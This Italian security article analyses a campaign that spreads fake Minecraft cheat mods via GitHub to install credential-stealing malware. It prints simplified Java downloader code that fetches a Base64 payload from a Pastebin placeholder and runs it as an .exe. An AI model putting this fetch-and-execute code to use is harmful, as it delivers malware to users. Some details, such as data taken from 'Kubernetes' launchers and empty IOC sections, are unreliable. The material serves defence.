Giocatori Minecraft in pericolo: Stargazers utilizza falsi mod per infettare

All'inizio del 2025, Check Point Research ha individuato una campagna malware sofisticata che prende di mira i giocatori di Minecraft tramite GitHub. I threat actor – operanti nel cosiddetto Stargazers Ghost Network, un modello di Distribution‑as‑a‑Service (DaaS) – hanno diffuso mod contraffatti di cheat molto popolari, come Oringo e Taunahi, per attirare le vittime.

Questa infrastruttura DaaS sfrutta centinaia di account “ghost” per aumentare la legittimità degli artefatti: fork, star e watch vengono utilizzati per simulare progetti attivi e diffondere malware in modo virale.

Technical deep dive: catena d’infezione multilivello

1. Mod Java (stage 1)

L’attacco si avvia quando un utente scarica e piazza nella directory mods/ un .jar moderatamente attraente, ad esempio Oringo‑1.8.9.jar. Nonostante l’antivirus lo ignori (in quanto eseguibile Java scarsamente analizzato), fornisce un launcher che verifica la presenza di un’installazione Minecraft e scarica la seconda fase.

2. Stealer Java (stage 2)

Il secondo modula—sempre in Java—raccoglie token di Minecraft e dati dai launcher Kubernetes, quindi scarica silenziosamente un payload .NET da un indirizzo offuscato in Base64 via Pastebin.

3. .NET stealer “44 CALIBER” (stage 3)

Il payload finale amplifica il raggio d’azione: esfiltra password da browser, portafogli crypto, credenziali Steam, Telegram e Discord, acquisisce screenshot, dati clipboard e info di sistema.

Approfondiamo ora la struttura e il comportamento del JAR downloader.

Fase 1 – Il JAR iniziale: un downloader camuffato da mod Minecraft

Aspetto esteriore

Il file è un archivio .jar, spesso nominato come Oringo‑1.8.9.jar, ForgeHax.jar, o simili, nomi associati a cheat noti o mod "utility". Viene inserito manualmente nella cartella /mods dagli utenti (target: Minecraft con Forge 1.8.9).

Static Analysis – Composizione del JAR

• Assenza di Main-Class nel manifest → non si avvia da solo come applicazione Java.

• Obbliga il contesto Forge (cioè l’ambiente Minecraft) per essere eseguito.

• Usa @Mod annotation del Forge Mod Loader per dichiarare se stesso come una mod, così da attivarsi al runtime.

Esempio semplificato:

@Mod(modid = "oringo", version = "1.0")
public class OringoMod {
    @Mod.EventHandler
    public void init(FMLInitializationEvent event) {
        // Downloader viene attivato qui
        new Downloader().start();
    }
}

Fase 2 – Comportamento dinamico: esecuzione del downloader

La classe Downloader, offuscata ma riconoscibile dopo decompilazione, attiva un thread separato:

public class Downloader extends Thread {
    public void run() {
        String url = "https://pastebin.com/raw/abc123"; // offuscato in Base64 o simile
        String payload = readURL(url);
        byte[] exe = Base64.getDecoder().decode(payload);
        Path tempExe = Files.createTempFile("mcupdate", ".exe");
        Files.write(tempExe, exe);
        new ProcessBuilder(tempExe.toString()).start();
    }
}

Tecniche di offuscamento usate:

• Classi e metodi con nomi fittizi (a.b.a, c.d.e...)

• Stringhe codificate in Base64/ROT13/sostituzioni

• Reflection Java per nascondere chiamate come Files.write(), Runtime.exec()

Evading detection

Indicatori e IOC

Suggerimenti difensivi avanzati

• YARA rule su pattern @Mod + ProcessBuilder

• Controllo comportamentale Java con hook su API java.lang.Process

• Monitoraggio anomalie su %APPDATA%/.minecraft/mods/*.jar scritti di recente

• EDR rules per temp executables lanciati da javaw.exe

• Proxy e firewall URL allowlist (es. bloccare Pastebin in ambienti aziendali)

  ---

Obiettivo del threat actor e attribution

Il profilo identificato dagli analisti presenta firme specifiche:

• File con commenti in russo

• Timestamp UTC+3 coerenti con utenti russi/SL

• Elementi come il package me.baikal.club, riferiti al lago in Russia orientale

È quindi probabile che l’autore sia un threat actor russofono attivo nella sfera criminale informatica.

Check Point ha calcolato oltre 500 repo con circa 700 star distribuite da 70 account. Si stima oltre 1.500 sistemi compromessi finora.

Evasione e sfide difensive

• Java first-stage rimane invisibile ai motori AV generici, dato che il .jar non include il manifest “Main-Class” e attende il runtime di Minecraft.

• Sandboxing statico spesso ignora falle in mod Java non eseguite in contesti reali.

• GitHub abuse: l’uso di account “ghost” per mascherare i repository riduce l’allarme visivo e aumenta le vittime.

Riflessioni e mitigazioni

1. Whitelisting selettivo: solo mod ufficiali o firmate da community fidate (es. CurseForge con scanning).

2. Static+dynamic code analysis: non fidarsi dell'estensione .jar, ma fare reverse engineering delle classi.

3. Monitoring GitHub interno: per team che sviluppano o testano mod, monitorare stars/forks e reputazione degli autori.

4. Controllo rete e DNS: bloccare in azienda accessi a domini sospetti (es. URL Pastebin in Base64).

5. Educazione utenti: sensibilizzare gamers e sviluppatori non affermati sul download sicuro e i rischi.

Questa campagna è un esempio calzante di come il gaming possa diventare vettore per attacchi APT: un framework Java primo stadio, invisibile alle soluzioni standard, seguito da payload .NET avanzati, e abilmente distribuito tramite un network sofisticato su GitHub. Il risultato? Esfiltrazione di credenziali e portafogli crypto, con potenziali estensioni future verso infrastrutture corporate.

Per la community cybersecurity, il take-home è chiaro: i settori “non tradizionali”—come gaming e modding—possono nascondere minacce complesse. L’approccio difensivo deve essere olistico, combinando threat intelligence, controllo delle supply chain digitali ed esercizi red teaming focalizzati su ambienti di sviluppo e test.